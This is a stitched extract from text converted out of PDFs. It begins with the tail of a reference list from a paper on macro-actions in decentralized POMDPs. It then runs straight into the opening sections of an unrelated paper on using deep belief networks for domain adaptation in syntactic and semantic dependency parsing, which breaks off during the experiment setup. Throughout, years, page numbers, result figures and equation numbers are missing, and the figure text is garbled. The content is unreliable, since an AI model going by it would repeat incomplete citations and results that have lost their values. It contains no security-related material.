in proceedings of the aaai conference on artificial intelligence, pp. – . amato, c., chowdhary, g., geramifard, a., ure, n. k., & kochenderfer, m. j. ( ). decentralized control of partially observable markov decision processes. in proceedings of the ieee conference on decision and control, pp. – . amato, c., dibangoye, j. s., & zilberstein, s. ( ). incremental policy generation for finite-horizon dec-pomdps. in proceedings of the international conference on au- tomated planning and scheduling, pp. – . amato, c., konidaris, g. d., anders, a., cruz, g., how, j. p., & kaelbling, l. p. ( ). policy search for multi-robot coordination under uncertainty. in proceedings of the robotics: science and systems conference. amato, konidaris, kaelbling & how amato, c., konidaris, g. d., anders, a., cruz, g., how, j. p., & kaelbling, l. p. ( ). policy search for multi-robot coordination under uncertainty. the international jour- nal of robotics research. aras, r., dutech, a., & charpillet, f. ( ). mixed integer linear programming for exact finite-horizon planning in decentralized pomdps. in proceedings of the international conference on automated planning and scheduling, pp. – . balch, t., & arkin, r. c. ( ). behavior-based formation control for multi-robot teams. ieee transactions on robotics and automation, ( ), – . barto, a., & mahadevan, s. ( ). recent advances in hierarchical reinforcement learning. discrete event dynamic systems, , – . becker, r., lesser, v., & zilberstein, s. ( a). decentralized markov decision processes with event-driven interactions. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . becker, r., zilberstein, s., lesser, v., & goldman, c. v. ( b). solving transition- independent decentralized markov decision processes. journal of artificial intelligence research, , – . beckers, r., holland, o., & deneubourg, j.-l. ( ). from local actions to global tasks: stigmergy and collective robotics. in artificial life iv, vol. , p. . belta, c., bicchi, a., egerstedt, m., frazzoli, e., klavins, e., & pappas, g. j. ( ). symbolic planning and control of robot motion [grand challenges of robotics]. robotics & automation magazine, ieee, ( ), – . bernstein, d. s., amato, c., hansen, e. a., & zilberstein, s. ( ). policy iteration for decentralized control of markov decision processes. journal of artificial intelligence research, , – . bernstein, d. s., givan, r., immerman, n., & zilberstein, s. ( ). the complexity of decentralized control of markov decision processes. mathematics of operations research, ( ), – . bohren, j. ( ). smach. http://wiki.ros.org/smach/. boularias, a., & chaib-draa, b. ( ). exact dynamic programming for decentralized pomdps with lossless policy compression. in proceedings of the international con- ference on automated planning and scheduling. dias, m. b., & stentz, a. t. ( ). a comparative study between centralized, market- based, and behavioral multirobot coordination approaches. in proceedings of ieee/rsj international conference on intelligent robots and systems, vol. , pp. – . dibangoye, j. s., amato, c., buffet, o., & charpillet, f. ( ). optimally solving dec- pomdps as continuous-state mdps. in proceedings of the international joint con- ference on artificial intelligence. dibangoye, j. s., amato, c., buffet, o., & charpillet, f. ( ). optimally solving dec- pomdps as continuous-state mdps. journal of artificial intelligence research, , – . modeling and planning with macro-actions in decentralized pomdps dibangoye, j. 
s., amato, c., doniec, a., & charpillet, f. ( ). producing efficient error- bounded solutions for transition independent decentralized mdps. in proceedings of the international conference on autonomous agents and multiagent systems. dietterich, t. g. ( ). hierarchical reinforcement learning with the maxq value function decomposition. journal of artificial intelligence research, , – . emery-montemerlo, r., gordon, g., schneider, j., & thrun, s. ( ). game theoretic control for robot teams. in proceedings of the international conference on robotics and automation, pp. – . foerster, j., assael, i. a., de freitas, n., & whiteson, s. ( ). learning to communicate with deep multi-agent reinforcement learning. in advances in neural information processing systems, pp. – . gerkey, b. p., & matarić, m. j. ( ). a formal analysis and taxonomy of task allocation in multi-robot systems. international journal of robotics research, ( ), – . ghavamzadeh, m., mahadevan, s., & makar, r. ( ). hierarchical multi-agent rein- forcement learning. journal of autonomous agents and multi-agent systems, ( ), – . hansen, e. a., bernstein, d. s., & zilberstein, s. ( ). dynamic programming for partially observable stochastic games. in proceedings of the national conference on artificial intelligence, pp. – . he, r., brunskill, e., & roy, n. ( ). efficient planning under uncertainty with macro- actions. journal of artificial intelligence research, – . hoang, t. n., xiao, y., sivakumar, k., amato, c., & how, j. ( ). near-optimal ad- versarial policy switching for decentralized asynchronous multi-agent systems. in proceedings of the international conference on robotics and automation. horling, b., & lesser, v. ( ). a survey of multi-agent organizational paradigms. the knowledge engineering review, ( ), – . kaelbling, l. p., littman, m. l., & cassandra, a. r. ( ). planning and acting in partially observable stochastic domains. artificial intelligence, , – . kalra, n., ferguson, d., & stentz, a. t. ( ). hoplites: a market-based framework for planned tight coordination in multirobot teams. in proceedings of the international conference on robotics and automation, pp. – . konidaris, g., & barto, a. g. ( ). building portable options: skill transfer in rein- forcement learning. proceedings of the international joint conference on artificial intelligence, , – . konidaris, g., kaelbling, l. p., & lozano-perez, t. ( ). from skills to symbols: learn- ing symbolic representations for abstract high-level planning. journal of artificial intelligence research, , – . konidaris, g. d., & barto, a. g. ( ). skill discovery in continuous reinforcement learning domains using skill chaining. in advances in neural information processing systems , pp. – . amato, konidaris, kaelbling & how kube, c. r., & bonabeau, e. ( ). cooperative transport by ants and robots. robotics and autonomous systems, ( - ), – . kumar, a., mostafa, h., & zilberstein, s. ( ). dual formulations for optimizing dec- pomdp controllers. in proceedings of the international conference on automated planning and scheduling. kumar, a., & zilberstein, s. ( ). point-based backup for decentralized pomdps: com- plexity and new algorithms. in proceedings of the international conference on au- tonomous agents and multiagent systems, pp. – . kumar, a., zilberstein, s., & toussaint, m. ( ). probabilistic inference techniques for scalable multiagent decision making. journal of artificial intelligence research, ( ), – . lim, z., sun, l., & hsu, d. j. ( ). 
monte carlo value iteration with macro-actions. in advances in neural information processing systems, pp. – . liu, m., amato, c., anesta, e., griffith, j. d., & how, j. p. ( ). learning for decen- tralized control of multiagent systems in large partially observable stochastic environ- ments. in proceedings of the aaai conference on artificial intelligence. liu, m., amato, c., liao, x., carin, l., & how, j. p. ( ). stick-breaking policy learning in dec-pomdps. in proceedings of the international joint conference on artificial intelligence. liu, m., sivakumar, k., omidshafiei, s., amato, c., & how, j. p. ( ). learning for multi-robot cooperation in partially observable stochastic environments with macro- actions. in proceedings of ieee/rsj international conference on intelligent robots and systems, pp. – . loizou, s. g., & kyriakopoulos, k. j. ( ). automatic synthesis of multi-agent motion tasks based on ltl specifications. in decision and control, . cdc. rd ieee conference on, vol. , pp. – . ieee. lowe, r., wu, y., tamar, a., harb, j., abbeel, o. p., & mordatch, i. ( ). multi-agent actor-critic for mixed cooperative-competitive environments. in advances in neural information processing systems, pp. – . mcgovern, a., & barto, a. g. ( ). automatic discovery of subgoals in reinforcement learning using diverse density. in proceedings of the eighteenth international confer- ence on machine learning, pp. – . melo, f., & veloso, m. ( ). decentralized mdps with sparse interactions. artificial intelligence. messias, j. v., spaan, m. t. j., & lima, p. u. ( ). gsmdps for multi-robot sequential decision-making. in proceedings of the twenty-seventh aaai conference on artificial intelligence, pp. – . nair, r., varakantham, p., tambe, m., & yokoo, m. ( ). networked distributed pomdps: a synthesis of distributed constraint optimization and pomdps. in pro- ceedings of the national conference on artificial intelligence. modeling and planning with macro-actions in decentralized pomdps nguyen, d. t., kumar, a., & lau, h. c. ( a). collective multiagent sequential deci- sion making under uncertainty. in proceedings of the aaai conference on artificial intelligence. nguyen, d. t., kumar, a., & lau, h. c. ( b). policy gradient with value function approximation for collective multiagent planning. in advances in neural information processing systems, pp. – . oliehoek, f. a. ( ). decentralized pomdps. in wiering, m., & van otterlo, m. (eds.), reinforcement learning: state of the art, vol. of adaptation, learning, and opti- mization, pp. – . springer berlin heidelberg. oliehoek, f. a., & amato, c. ( ). a concise introduction to decentralized pomdps. springer. oliehoek, f. a., kooi, j. f., & vlassis, n. ( ). the cross-entropy method for policy search in decentralized pomdps. informatica, , – . oliehoek, f. a., spaan, m. t. j., amato, c., & whiteson, s. ( ). incremental clustering and expansion for faster optimal planning in dec-pomdps. journal of artificial intelligence research, , – . oliehoek, f. a., spaan, m. t. j., & vlassis, n. ( ). optimal and approximate q-value functions for decentralized pomdps. journal of artificial intelligence research, , – . oliehoek, f. a., whiteson, s., & spaan, m. t. j. ( ). lossless clustering of histories in decentralized pomdps. in proceedings of the international conference on au- tonomous agents and multiagent systems. oliehoek, f. a., whiteson, s., & spaan, m. t. j. ( ). approximate solutions for factored dec-pomdps with many agents. 
in proceedings of the international conference on autonomous agents and multiagent systems. omidshafiei, s., agha-mohammadi, a., amato, c., & how, j. p. ( ). decentralized control of partially observable markov decision processes using belief space macro- actions. in proceedings of the international conference on robotics and automation, pp. – . omidshafiei, s., agha-mohammadi, a., amato, c., & how, j. p. ( ). decentralized control of multi-robot partially observable markov decision processes using belief space macro-actions. the international journal of robotics research. omidshafiei, s., agha-mohammadi, a., amato, c., liu, s.-y., how, j. p., & vian, j. ( ). graph-based cross entropy method for solving multi-robot decentralized pomdps. in proceedings of the international conference on robotics and automation. omidshafiei, s., kim, d.-k., liu, m., tesauro, g., riemer, m., amato, c., campbell, m., & how, j. ( ). learning to teach in cooperative multiagent reinforcement learning. in proceedings of the aaai conference on artificial intelligence. omidshafiei, s., liu, s.-y., everett, m., lopez, b., amato, c., liu, m., how, j. p., & vian., j. ( a). semantic-level decentralized multi-robot decision-making using amato, konidaris, kaelbling & how probabilistic macro-observations. in proceedings of the international conference on robotics and automation. omidshafiei, s., pazis, j., amato, c., how, j. p., & vian, j. ( b). deep decentralized multi-task multi-agent reinforcement learning under partial observability. in proceed- ings of the international conference on machine learning. pajarinen, j. k., & peltonen, j. ( ). periodic finite state controllers for efficient pomdp and dec-pomdp planning. in shawe-taylor, j., zemel, r., bartlett, p., pereira, f., & weinberger, k. (eds.), advances in neural information processing systems , pp. – . palmer, g., tuyls, k., bloembergen, d., & savani, r. ( ). lenient multi-agent deep reinforcement learning. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . parker, l. e. ( ). alliance: an architecture for fault tolerant multirobot cooperation. ieee transactions on robotics and automation, ( ), – . puterman, m. l. ( ). markov decision processes: discrete stochastic dynamic pro- gramming. wiley-interscience. quigley, m., conley, k., gerkey, b. p., faust, j., foote, t., leibs, j., wheeler, r., & ng, a. y. ( ). ros: an open-source robot operating system. in icra workshop on open source software. rashid, t., samvelyan, m., schroeder, c., farquhar, g., foerster, j., & whiteson, s. ( ). qmix: monotonic value function factorisation for deep multi-agent reinforcement learning. in proceedings of the international conference on machine learning, pp. – . rekleitis, i., lee-shue, v., new, a. p., & choset, h. ( ). limited communication, multi- robot team based coverage. in robotics and automation, . proceedings. icra’ . ieee international conference on, vol. , pp. – . ieee. seuken, s., & zilberstein, s. ( a). improved memory-bounded dynamic programming for decentralized pomdps. in proceedings of the conference on uncertainty in artificial intelligence, pp. – . seuken, s., & zilberstein, s. ( b). memory-bounded dynamic programming for dec- pomdps. in proceedings of the international joint conference on artificial intelli- gence, pp. – . silver, d., & ciosek, k. ( ). compositional planning using optimal option models. in proceedings of the international conference on machine learning. sonu, e., chen, y., & doshi, p. ( ). 
individual planning in agent populations: ex- ploiting anonymity and frame-action hypergraphs. in proceedings of the international conference on automated planning and scheduling. spaan, m. t. j., & melo, f. s. ( ). interaction-driven markov games for decentralized multiagent planning under uncertainty. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . modeling and planning with macro-actions in decentralized pomdps stilman, m., & kuffner, j. ( ). navigation among movable obstacles: real-time reasoning in complex environments. international journal on humanoid robotics, ( ), – . stone, p., sutton, r. s., & kuhlmann, g. ( ). reinforcement learning for robocup soccer keepaway. adaptive behavior, ( ), – . stroupe, a. w., ravichandran, r., & balch, t. ( ). value-based action selection for exploration and dynamic target observation with robot teams. in proceedings of the international conference on robotics and automation, vol. , pp. – . ieee. sutton, r. s., precup, d., & singh, s. ( ). between mdps and semi-mdps: a framework for temporal abstraction in reinforcement learning. artificial intelligence, ( ), – . szer, d., charpillet, f., & zilberstein, s. ( ). maa*: a heuristic search algorithm for solving decentralized pomdps. in proceedings of the conference on uncertainty in artificial intelligence. theocharous, g., & kaelbling, l. p. ( ). approximate planning in pomdps with macro-actions. in advances in neural information processing systems. thrun, s., burgard, w., & fox, d. ( ). probabilistic robotics (intelligent robotics and autonomous agents). the mit press. varakantham, p., adulyasak, y., & jaillet, p. ( ). decentralized stochastic planning with anonymity in interactions. in proceedings of the aaai conference on artificial intelligence, pp. – . velagapudi, p., varakantham, p. r., sycara, k., & scerri, p. ( ). distributed model shaping for scaling to decentralized pomdps with hundreds of agents. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . wu, f., zilberstein, s., & chen, x. ( a). point-based policy generation for decentralized pomdps. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . wu, f., zilberstein, s., & chen, x. ( b). rollout sampling policy iteration for de- centralized pomdps. in proceedings of the conference on uncertainty in artificial intelligence, pp. – . wu, f., zilberstein, s., & jennings, n. r. ( ). monte-carlo expectation maximization for decentralized pomdps. in proceedings of the international joint conference on artificial intelligence, pp. – . aaai press. domain adaptation for syntactic and semantic dependency parsing using deep belief networks haitong yang, tao zhuang and chengqing zong national laboratory of pattern recognition institute of automation, chinese academy of sciences, beijing, , china {htyang, tao.zhuang, cqzong}@nlpr.ia.ac.cn abstract in current systems for syntactic and seman- tic dependency parsing, people usually de- fine a very high-dimensional feature space to achieve good performance. but these systems often suffer severe performance drops on out- of-domain test data due to the diversity of fea- tures of different domains. this paper fo- cuses on how to relieve this domain adapta- tion problem with the help of unlabeled tar- get domain data. we propose a deep learning method to adapt both syntactic and semantic parsers. 
with additional unlabeled target domain data, our method can learn a latent feature representation (lfr) that is beneficial to both domains. experiments on english data in the conll shared task show that our method largely reduced the performance drop on out-of-domain test data. moreover, we get a macro f score that is . points higher than the best system in the conll shared task in out-of-domain tests.

introduction
both syntactic and semantic dependency parsing are standard tasks in the nlp community. the state-of-the-art model performs well if the test data comes from the domain of the training data. but if the test data comes from a different domain, the performance drops severely. the results of the shared tasks of conll and (surdeanu et al., ; hajič et al., ) also substantiate this argument. to relieve this domain adaptation problem, in this paper we propose a deep learning method for both syntactic and semantic parsers. we focus on the situation in which, besides source domain training data and target domain test data, we also have some unlabeled target domain data.

many syntactic and semantic parsers are developed using a supervised learning paradigm, where each data sample is represented as a vector of features, usually a high-dimensional one. the performance degradation on target domain test data is mainly caused by the diversity of features of different domains, i.e., many features in target domain test data are never seen in source domain training data. previous work has shown that using word clusters to replace the sparse lexicalized features (koo et al., ; turian et al., ) helps relieve the performance degradation on the target domain. but for syntactic and semantic parsing, people also use a lot of syntactic features, i.e., features extracted from syntactic trees. for example, the relation path between a predicate and an argument is a syntactic feature used in semantic dependency parsing (johansson and nugues, ). figure shows an example of this relation path feature. obviously, syntactic features like this are also very sparse and usually specific to each domain. the method of clustering fails to generalize these kinds of features. our method, however, is very different from clustering specific features and substituting these features with their clusters. instead, we attack the domain adaptation problem by learning a latent feature representation (lfr) for different domains, which is similar to titov ( ).

[figure : a path feature example, showing the dependency tree of the sentence "she wants to pay you a visit" with arc labels root, sbj, oprd, im, obj, nmod, and p. the red edges are the path between she and visit, and thus the relation path feature between them is sbj↑oprd↓im↓obj↓.]

formally, we propose a deep belief network (dbn) model to represent a data sample using a vector of latent features. this latent feature vector is inferred by our dbn model based on the data sample's original feature vector. our dbn model is trained unsupervisedly on original feature vectors of data in both domains: training data from the source domain, and unlabeled data from the target domain. so our dbn model can produce a common feature representation for data from both domains.
a common feature representation can make two domains more similar and thus is very helpful for domain adaptation (blitzer, ). discriminative models using our latent features adapt better to the target domain than models using original features.

discriminative models in syntactic and semantic parsers usually use millions of features. applying a typical dbn to learn a sensible lfr on that many original features is computationally too expensive and impractical (raina et al., ). therefore, we constrain the dbn by splitting the original features into groups. in this way, we largely reduce the computational cost and make lfr learning practical.

we carried out experiments on the english data of the conll shared task. we use a basic pipelined system and compare the effectiveness of the two feature representations: the original feature representation and our lfr. using the original features, the performance drop on out-of-domain test data is . points in macro f score. in contrast, using the lfr, the performance drop is only . points. we have also achieved a macro f score of . % on the out-of-domain test data. as far as we know, this is the best result on this data set to date.

related work
dependency parsing and semantic role labeling are two standard tasks in the nlp community. there has been much work on the two tasks (mcdonald et al., ; gildea and jurafsky, ; yang and zong, ; zhuang and zong, a; zhuang and zong, b, etc.). among them, research on domain adaptation for dependency parsing and srl is directly related to our work. dredze et al. ( ) show that domain adaptation is hard for dependency parsing, based on results in the conll shared task (nivre et al., ). chen et al. ( ) adapted a syntactic dependency parser by learning reliable information on shorter dependencies in unlabeled target domain data, but they do not consider the task of semantic dependency parsing. huang et al. ( ) used an hmm-based latent variable language model to adapt an srl system. their method is tailored for a chunking-based srl system and can hardly be applied to our dependency-based task. weston et al. ( ) used deep neural networks to improve an srl system, but their tests are on in-domain data.

in terms of methodology, the work of glorot et al. ( ) and titov ( ) is closely related to ours. they also focus on learning lfrs for domain adaptation. however, their work deals with domain adaptation for sentiment classification, which uses much fewer features and training samples, so they do not need to worry about computational cost as much as we do. titov ( ) used a graphical model that has only one layer of hidden variables. in contrast, we need to use a model with two layers of hidden variables and split the first hidden layer to reduce computational cost. the model of titov ( ) also embodies a specific classifier, but our model is independent of the classifier to be used. glorot et al. ( ) used a model called stacked denoising auto-encoders, which also contains multiple hidden layers. however, they do not exploit the hierarchical structure of their model to reduce computational cost. by splitting, our model contains far fewer parameters than theirs. in fact, the models in glorot et al. ( ) and titov ( ) cannot be applied to our task simply because of the high computational cost.

our dbn model for lfr
in discriminative models, each data sample is represented as a vector of features. our dbn model maps this original feature vector to a vector of latent features.
and we use this latent feature vector to represent the sample, i.e., we replace the whole original feature vector by the latent feature vector. in this section, we introduce how our dbn model represents a data sample as a vector of latent features. before introducing our dbn model, we first review a simpler model called restricted boltzmann machines (rbm) (hinton et al., ). when training a dbn model, the rbm is used as a basic unit in a dbn.

. restricted boltzmann machines
an rbm is an undirected graphical model with a layer of visible variables v = (v_1, ..., v_m) and a layer of hidden variables h = (h_1, ..., h_n). these variables are binary. figure shows a graphical representation of an rbm.

[figure : graphical representations of an rbm: (a) represents an rbm; (b) is a more compact representation.]

the parameters of an rbm are θ = (w, a, b), where w = (w_{ij})_{m×n} is a matrix with w_{ij} being the weight for the edge between v_i and h_j, and a = (a_1, ..., a_m), b = (b_1, ..., b_n) are bias vectors for v and h respectively. the probabilistic model of an rbm is:

p(v, h | θ) = (1/z(θ)) exp(−e(v, h))   ( )

where

e(v, h) = −∑_{i=1}^{m} a_i v_i − ∑_{j=1}^{n} b_j h_j − ∑_{i=1}^{m} ∑_{j=1}^{n} v_i w_{ij} h_j,   z(θ) = ∑_{v,h} exp(−e(v, h)).

because the connections in an rbm are only between visible and hidden variables, the conditional distribution over a hidden or a visible variable is quite simple:

p(h_j = 1 | v) = σ(b_j + ∑_{i=1}^{m} v_i w_{ij})   ( )

p(v_i = 1 | h) = σ(a_i + ∑_{j=1}^{n} h_j w_{ij})   ( )

where σ(x) = 1/(1 + exp(−x)) is the logistic sigmoid function. an rbm can be efficiently trained on a sequence of visible vectors using the contrastive divergence method (hinton, ).

. the problem of large scale
in our syntactic and semantic parsing task, all features are binary. so each data sample (a shift action in syntactic parsing or an argument candidate in semantic parsing) is represented as a binary feature vector. by treating a sample's feature vector as the visible variable vector in an rbm, and taking the hidden variables as latent features, we could get the lfr of this sample using the rbm. however, for our syntactic and semantic parsing tasks, training such an rbm is computationally impractical due to the following considerations. let m, n denote respectively the number of visible and hidden variables in the rbm. then there are o(mn) parameters in this rbm. if we train the rbm on d samples, then the time complexity for contrastive divergence training is o(mnd). for syntactic or semantic parsing, there are over million unique binary features, and millions of training samples. that means both m and d are in an order of . with m and n of that order, n should not be chosen too small to get a sensible lfr (hinton, ). our experience indicates that n should be at least in an order of . now we see why the o(mnd) complexity is formidable for our task.

. our dbn model
a dbn is a probabilistic generative model that is composed of multiple layers of stochastic, latent variables (hinton et al., ). the motivation of using a dbn is two-fold. first, previous research has shown that a deep network can capture high-level correlations between visible variables better than an rbm (bengio, ). second, as shown in the preceding subsection, the large scale of our task poses a great challenge for learning an lfr. by manipulating the hierarchical structure of a dbn, we can significantly reduce the number of parameters in the dbn model. this largely reduces the computational cost for training the dbn. without this technique, it is impractical to learn a dbn model with that many parameters on large training sets.

[figure : our dbn model. the blue nodes stand for the visible variables (v) and the blank nodes stand for the hidden variables (h_1 and h_2). the symbols are also used in the figures of the following subsections.]

as shown in fig. , our dbn model contains two layers of hidden variables, h_1 and h_2, and a visible vector v. the visible vector corresponds to a sample's original feature vector. the second-layer hidden variable vector h_2 is used as the lfr of this sample. suppose there are m, n_1, n_2 variables in v, h_1, h_2 respectively. to reduce the number of parameters in the dbn, we split its first layer (h_1 − v) into k groups, as we will explain in the following subsection. we confine the connections in this layer to variables within the same group. so there are only m n_1 / k parameters in the first layer. without splitting, the number of parameters would be m n_1. therefore, learning that many parameters requires too much computation. by splitting, we reduce the number of parameters by a factor of k. if we choose k big enough, learning is feasible. the second layer (h_1 − h_2) is fully connected, so that the variables in the second layer can capture the relations between variables in different groups in the first layer. there are n_1 n_2 parameters in the second layer. because n_1 and n_2 are relatively small, learning the parameters in the second layer is also feasible. in summary, by splitting the first layer into groups, we have largely reduced the number of parameters in our dbn model. this makes learning our dbn model practical for our task. in our task, the visible variables correspond to original binary features and the second-layer hidden variables are used as the lfr of these original features. one deficiency of splitting is that the relationships between original features in different groups cannot be captured by hidden variables in the first layer. however, this deficiency is compensated for by using the second layer to capture relationships between all variables in the first layer. in this way, the second layer still captures the relationships between all original features indirectly.

. . splitting features into groups
when we split the first layer into k groups, every group, except the last one, contains ⌊m/k⌋ visible variables and ⌊n_1/k⌋ hidden variables. the last group contains the remaining visible and hidden variables. but how to split the visible variables, i.e., the original features, into these groups? of course there are many ways to split the original features, but it is difficult to find a good principle to split, so we tried two splitting strategies in this paper. the first strategy is very simple. we arrange all features in the order they appeared in the training data. suppose each group contains r original features. we just put the first r unique features of the training data into the first group, the following r unique features into the second group, and so on.

the second strategy is more sophisticated. all features can be divided into three categories: the common features, the source-specific features and the target-specific features. its main idea is to make each group contain the three categories of features evenly, which we think makes the distribution of features close to the 'true' distribution over domains. let f_s and f_t denote the sets of features that appeared in source and target domain data respectively. we collect f_s and f_t from our training data.
the features in fs and ft are are ordered the same as the order they appeared in training data. and let fs∩t = fs ∩ ft (the common features), fs\t = fs\ft (the source-specific features), ft\s = ft\fs (the target-specific features). so, to evenly dis- tribute features in fs∩t, fs\t and ft\s to each group, each group should consist of |fs∩t|/k, |fs\t|/k and |ft\s|/k features from fs∩t, fs\t and ft\s respec- tively. therefore, we put the first |fs∩t|/k features from fs∩t, the first |fs\t|/k features from fs\t and the first |ft\s|/k features from ft\s into the first group. similarly, we put the second |fs∩t|/k fea- tures from fs∩t, the second |fs\t|/k features from fs\t and the second |ft\s|/k features from ft\s into the second group. the intuition of this strategy is to let features in fs∩t act as pivot features that link fea- tures in fs\t and ft\s in each group. in this way, the first hidden layer might capture better relationships between features from source and target domains. . . lfr of a sample given a sample represented as a vector of origi- nal features, our dbn model will represent it as a vector of latent features. the sample’s original fea- ture vector corresponds to the visible vector v in our dbn model in figure . our dbn model uses the second-layer hidden variable vector h to represent this sample. therefore, we must infer the value of hidden variables in the second-layer given the vis- ible vector. this inference can be done using the methods in hinton et al., ( ). given the visible vector, the values of the hidden variables in every layer can be efficiently inferred in a single, bottom- up pass. . training our dbn model inference in a dbn is simple and fast. nonetheless, training a dbn is more complicated. a dbn can be trained in two stages: greedy layer-wise pretraining and fine tuning (hinton et al., ). . . greedy layer-wise pretraining in this stage, the dbn is treated as a stack of rbms as shown in figure . the second layer is treated as a single rbm. the first layer is treated as k parallel rbms with each group being one rbm. these k rbms are paral- lel because their visible variable vectors constitute a partition of the original feature vector. in this stage, we train these constituent rbms in a bottom- up layer-wise manner. to learn parameters in the first layer, we only need to learn the parameters of each rbm in the first layer. with the original feature vector v given, these k rbms can be trained using the contrastive diver- gence method (hinton, ). after the first layer is ...h h ...... ...... ... ... rbm ... ... rbm ... ... rbm ... ... rbm figure : stack of rbms in pretraining. trained, we will fix the parameters in the first layer and start to train the second layer. for the rbm of the second layer, its visible vari- ables are the hidden variables in the first layer. given an original feature vector v, we first infer the acti- vation probabilities for the hidden variables in the first layer using equation ( ). and we use these ac- tivation probabilities as values for visible variables in the second layer rbm. then we train the second layer rbm using contrastive divergence algorithm. note that the activation probabilities are not binary values. but this is only a trick for training because using probabilities generally produces better models (hinton et al., ). this trick does not change our assumption that each variable is binary. . . fine tuning the greedy layer-wise pretraining initializes the parameters of our dbn to sensible values. 
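the layer-wise pretraining just described can be summarized in a few lines. in this sketch, train_rbm and hidden_probabilities are hypothetical stand-ins for contrastive-divergence training of a single rbm and for computing p(h = 1 | v) with a trained rbm.

```python
import numpy as np

def pretrain_dbn(data, groups, n1_per_group, n2, train_rbm, hidden_probabilities):
    """Greedy layer-wise pretraining (a sketch).
    data: (num_samples, m) binary original feature vectors;
    groups: list of k index lists partitioning the visible features."""
    # first layer: k parallel RBMs, one per feature group
    first_layer = [train_rbm(data[:, idx], n1_per_group) for idx in groups]

    # the hidden activation probabilities of the (now fixed) first layer
    # become the 'visible' data of the single, fully connected
    # second-layer RBM; this is the probability trick mentioned above
    h1 = np.hstack([hidden_probabilities(rbm, data[:, idx])
                    for rbm, idx in zip(first_layer, groups)])
    second_layer = train_rbm(h1, n2)
    return first_layer, second_layer
```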
but these values are not optimal and the parameters need to be fine tuned. for fine tuning, we unroll the dbn to form an autoencoder as in hinton and salakhutdinov ( ), which is shown in figure . in this autoencoder, the stochastic activities of bi- nary hidden variables are replaced by its activation probabilities. so the autoencoder is in essence a feed-forward neural network. we tune the param- eters of our dbn model on this autoencoder using backpropagation algorithm. domain adaptation with our dbn model in this section, we introduce how to use our dbn model to adapt a basic syntactic and semantic de- ... ...... ...... ...... ...... ...... ...... ...... ...... figure : unrolling the dbn. pendency parsing system to target domain. . the basic pipelined system we build a typical pipelined system, which first an- alyze syntactic dependencies, and then analyze se- mantic dependencies. this basic system only serves as a platform for experimenting with different fea- ture representations. so we just briefly introduce our basic system in this subsection. . . syntactic dependency parsing for syntactic dependency parsing, we use a de- terministic shift-reduce method as in nivre et al., ( ). it has four basic actions: left-arc, right-arc, shift, and reduce. a classifier is used to determine an action at each step. to decide the label for each dependency link, we extend the left/right-arc actions to their corresponding multi-label actions, leading to left-arc and right-arc actions. altogether a - class problem is yielded for parsing action classifi- cation. we add arcs to the dependency graph in an arc eager manner as in hall et al., ( ). we also projectivize the non-projective sequences in training data using the transformation from nivre and nils- son ( ). a maximum entropy classifier is used to make decisions at each step. the features utilized are the same as those in zhao et al., ( ). . . semantic dependency parsing our semantic dependency parser is similar to the one in che et al., ( ). we first train a predicate sense classifier on training data, using the same fea- tures as in che et al., ( ). again, a maximum en- tropy classifier is employed. given a predicate, we need to decide its semantic dependency relation with each word in the sentence. to reduce the number of argument candidates, we adopt the pruning strat- egy in zhao et al., ( ), which is adapted from the strategy in xue and palmer ( ). in the seman- tic role classification stage, we use a maximum en- tropy classifier to predict the probabilities of a can- didate to be each semantic role. we train two differ- ent classifiers for verb and noun predicates using the same features as in che et al., ( ). we use a sim- ple method for post processing. if there are dupli- cate arguments for arg ∼arg , we preserve the one with the highest classification probability and remove its duplicates. . adapting the basic system to target domain in our basic pipeline system, both the syntactic and semantic dependency parsers are built using dis- criminative models. we train a syntactic parsing model and a semantic parsing model using the orig- inal feature representation. we will refer to this syn- tactic parsing model as orisynmodel, and the se- mantic parsing model as orisemmodel. however, these two models do not adapt well to the target do- main. so we use the lfr of our dbn model to train new syntactic and semantic parsing models. 
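putting the pieces together, the adaptation recipe described here (and detailed in the next subsections) looks roughly as follows; every callable is a hypothetical placeholder for one component of the pipeline, not an api from the paper.

```python
def adapt_parser(train_sents, unlabeled_sents,
                 extract_features, train_model, train_dbn, to_lfr):
    """Sketch of the adaptation workflow for one parser (syntactic or
    semantic): train a baseline on original features, use it to obtain
    features on unlabeled target-domain text, learn the latent feature
    representation (LFR) with the DBN, then retrain on latent features."""
    # 1. baseline model (oriSynModel / oriSemModel) on original features
    train_feats = [extract_features(s, gold=True) for s in train_sents]
    ori_model = train_model(train_feats)

    # 2. history-based features on unlabeled data require parsing it first,
    #    so use the baseline model (this introduces some noise)
    unlab_feats = [extract_features(s, model=ori_model) for s in unlabeled_sents]

    # 3. learn the LFR on original features from both domains
    dbn = train_dbn(train_feats + unlab_feats)

    # 4. retrain with latent features (latSynModel / latSemModel)
    lat_model = train_model([to_lfr(dbn, f) for f in train_feats])
    return ori_model, dbn, lat_model
```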
we will refer to the new syntactic parsing model as latsyn- model, and the new semantic parsing model as lat- semmodel. details of using our dbn model are as follows. . . adapting the syntactic parser the input data for training our dbn model are the original feature vectors on training and unla- beled data. therefore, to train our dbn model, we first need to extract the original features for syntactic parsing on these data. features on training data can be directly extracted using golden-standard annota- tions. on unlabeled data, however, some features cannot be directly extracted. this is because our syntactic parser uses history-based features which depend on previous actions taken when parsing a sentence. therefore, features on unlabeled data can only be extracted after the data are parsed. to solve this problem, we first parse the unlabeled data using the already trained orisynmodel. in this way, we can obtain the features on the unlabeled data. be- cause of the poor performance of the orisynmodel on the target domain, the extracted features on un- labeled data contains some noise. however, exper- iments show that our dbn model can still learn a good lfr despite the noise in the extracted features. using the lfr, we can train the syntactic parsing model latsynmodel. then by applying the lfr on test and unlabeled data, we can parse the data using latsynmodel. experiments in later sections show that the latsynmodel adapts much better to the tar- get domain than the orisynmodel. . . adapting the semantic parser the situation here is similar to the adaptation of the syntactic parser. features on training data can be directly extracted. to extract features on unla- beled data, we need to have syntactic dependency trees on this data. so we use our latsynmodel to parse the unlabeled data first. and we automatically identify predicates on unlabeled data using a clas- sifier as in che et al., ( ). then we extract the original features for semantic parsing on unlabeled data. by feeding original features extracted on these data to our dbn model, we learn the lfr for se- mantic dependency parsing. using the lfr, we can train the semantic parsing model latsemmodel. experiments . experiment setup . . experiment data we use the english data in the conll shared task for experiments. the training data and in-domain test data are from the wsj corpus, whereas the out-of-domain test data is from the brown corpus. we also use unlabeled data consist- ing of the following sections of the brown corpus: k, l, m, n, p. the test data are excerpts from fic- tions. the unlabeled data are also 